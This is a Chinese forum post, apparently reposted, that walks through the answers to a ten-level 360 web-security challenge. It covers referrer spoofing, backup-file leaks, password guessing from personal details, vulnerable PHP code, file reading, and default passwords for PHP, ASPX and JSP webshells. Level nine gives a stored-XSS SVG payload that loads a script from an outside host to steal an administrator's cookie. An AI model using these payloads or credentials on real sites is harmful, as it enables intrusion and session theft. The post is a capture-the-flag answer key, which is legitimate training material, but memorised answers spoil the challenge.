UID1
性别保密
注册时间2013-7-10
最后登录1970-1-1
回帖0
在线时间 小时
精华
SB
威望
随币
成长值: 50900
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
闯关地址:http://attack.onebox.so.com/
第一关
Q: 第二关需要从hack.360.cn进入,直接点击按钮可行不通哦!~~
A: 设置来路为http://hack.360.cn/即可,可通过浏览器插件(HackBar)来快速完成
URl: http://attack.onebox.so.com/c6c299rf-check.html
Referrer: http://hack.360.cn/
第二关
Q: 密码在哪自己找哦!~~
A: 答案:i360
pass在一个加密的js中 http://attack.onebox.so.com/Public/js/encode.js
运行eval(password);
第三关
Q: 解码如下代码:
0x253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344A: 答案:welcometo360
$val){echo chr($val);}第四关
Q: 从图片中找通关密码吧(图片上的大写字母):
A: 答案:BLACKHATWORLD
图片是两张jpg合并而成的,通过JFIF提取出隐藏的图片
'第五关
Q: 作为黑阔的您,请回答如下问题
A: PHP SPY angel
ASPX SPY admin
JSP SPY ninty
第六关
Q: 开发人员安全意识比较差,经常忘记删除一些备份文件。
A: 答案:每个账号不同
Linux下vi编辑文件时,会生成一个临时文件(.filename.swp)
http://attack.onebox.so.com/c47e92bak-main.html.swp
第七关
Q: 提示:根据李雷的个人信息,猜解它的用户名和密码,登陆后就能拿到加密串。然后将加密串解密后即可拿到通关密钥!
姓名:李雷
生日:2014年3月5日
QQ:1987654321
Email:[email protected]
家庭住址:北京市东城区一号院一号楼一单元101
A: 密码:Lilei20140305 姓名+生日(首字母大写
加密串:91199faddb0f5abe576ea087ea708172
google查找
答案:360-hackgame-8-hello-world.php
页面验证码不会自动失效
第八关
Q: 以下是一段PHP代码,请选择有高危安全漏洞的代码行:
class MyTest{public function __set($key, $name){if (isset($this->_var[$key])) {return $this->_var[$key];}return false;}public function SetTemplate($lang){$lang = isset($lang) ? $lang : 'cn';include('template/' . $lang . '.php.html');}public function build($htmlfile='', $htmlpath='', $templateFile=''){$content = $this->fetch($templateFile);$htmlpath = !empty($htmlpath)?$htmlpath:HTML_PATH;$htmlfile = $htmlpath.$htmlfile.'HTML_FILE_SUFFIX';if(!is_dir(dirname($htmlfile)))mkdir(dirname($htmlfile),0755,true);if(false === file_put_contents($htmlfile,$content))throw new Exception('_CACHE_WRITE_ERROR_'.$htmlfile);return $content;}public function __set($key){if(isset($this->_var[$key])) {return $this->_var[$key];}}public function Upload($filename){$default_path = 'upload/';if (!file_exists($default_path))mkdir($default_path, 0777, true);$destination = $default_path . basename($filename);echo 'Saving your image to: ' . $destination;$jfh = fopen($destination, 'w') or die("can't open file");fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']);fclose($jfh);}public function fetch($templateFile=''){return file_get_contents($templateFile);}public function Filter($value,$safecode){$value = preg_replace("/(javascript?on(click|load|key|mouse|error|abort|move|unload|change|dblclick|move|reset|resize|submit)/i", "&111n\\2", $value);$value = preg_replace("/(.*?)<\/script>/si", $safecode, $value);$value = preg_replace("/(.*?)<\/iframe>/si", $safecode, $value);$value = preg_replace("/(.*?)/e", $safecode, $value);$value = preg_replace("//iesU", $safecode, $value);return $value;}}A: 答案:
$value = preg_replace("/(.*?)/e", $safecode, $value); //执行 function Filter$value = preg_replace("//iesU", $safecode, $value); //执行 function Filterreturn file_get_contents($templateFile); //读取文件 function fetchinclude('template/' . $lang . '.php.html'); //截断 function SetTemplate$destination = $default_path . basename($filename);//任意名称 function Upload$jfh = fopen($destination, 'w') or die("can't open file"); function Uploadfwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']); function Upload感觉这个题出的有问题,这个class本身都不能正常运行 里面有两个__set
function build 未被计算在答案内的原因,可能是因为代码取自thinkphp框架,所以。
第九关
Q: 这是一个留言板,你能想办法拿到留言管理人员的cookie吗?请使用HTML5的标签特性 [例如:SVG标签]~~
A: 留言内容:<svg/onload=document.body.appendChild(createElement(/script/.source)).src=String.fromCharCode(47,47,116,46,99,110,47,56,115,56,103,101,74,86)得到Cookie值: cc4b0a94f5a2e5a244a1cc44a7fb4cb3
第十关
Q: 这出题的家伙很懒,什么也没留下。只能自己想办法了!
A: 查看cookie多出一个display=5842b0a0df2d52533c241c6ec26089a8
在页面地址后添加:http://attack.onebox.so.com/jdad ... 2533c241c6ec26089a8 找出真正问题
Q: 我们用CentOS及APACHE为您提供服务,通关密码位于:/home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt
A: http://attack.onebox.so.com/jdad ... fd3c98015c03c12.txt
读取出内容为
check:d914e3ecf6cc481114a3f534a5faf90b+9fd30a9a7b2a862032dcb6374c6a827b!3fb80afe3936b4ef0f76446ee46024d5成功破关
恭喜您已成功通关。360网络攻防实验室期待您的加入。
随遇而安论坛 来源:网络转载
|
|